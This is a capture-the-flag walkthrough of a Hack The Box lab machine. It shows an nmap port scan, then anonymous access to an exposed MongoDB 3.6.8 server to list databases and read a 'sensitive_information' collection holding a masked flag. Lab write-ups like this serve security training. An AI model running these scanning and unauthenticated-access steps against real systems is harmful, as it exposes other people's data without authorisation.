This is another of the Very easy HTB Starting Point boxes.
$ nmap -sV -p- 10.129.143.75 --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-08 16:50 CEST
Nmap scan report for 10.129.143.75
Host is up (0.033s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds
As we can see in the Nmap results we hava a MongoDB version 3.6.8
MongoDB is a NoSQL database.
You can find more information in their documentation here: https://www.mongodb.com/docs
To be able to interact with the db, we need to install the MongoDB package into our Kali Linux.
it is included in the Kali repository, so we just need to use our apt.
$ sudo apt install mongodb
We try to connect and we realise that anonymous users can connect to, so no credentials are needed.
$ mongo mongodb://10.129.143.75:27017
MongoDB shell version v6.0.1
connecting to: mongodb://10.129.143.75:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("d732a698-b4ef-42d3-b3ae-d608e4802c33") }
MongoDB server version: 3.6.8
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
https://community.mongodb.com
---
The server generated these startup warnings when booting:
2022-10-08T14:49:44.575+0000 I STORAGE [initandlisten]
2022-10-08T14:49:44.575+0000 I STORAGE [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2022-10-08T14:49:44.575+0000 I STORAGE [initandlisten] ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten]
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten] ** WARNING: Access control is not enabled for the database.
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten] ** Read and write access to data and configuration is unrestricted.
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten]
---
>
Now we can list the databases available in the server with show dbs
command.
>show dbs
admin 0.000GB
config 0.000GB
local 0.000GB
sensitive_information 0.000GB
users 0.000GB
With use <database_name>
we can switch to the corresponding database.
>use sensitive_information
switched to db sensitive_information
show collections
will print a list of all collections for the current database.
>show collections
flag
db.collection.find().pretty()
find all documents in the collection and return the content in a format that is easy to read.
>db.flag.find().pretty()
{
"_id" : ObjectId("630e3dbcb82540ebbd1748c5"),
"flag" : "1b6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
}
Our flag is then: 1b6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX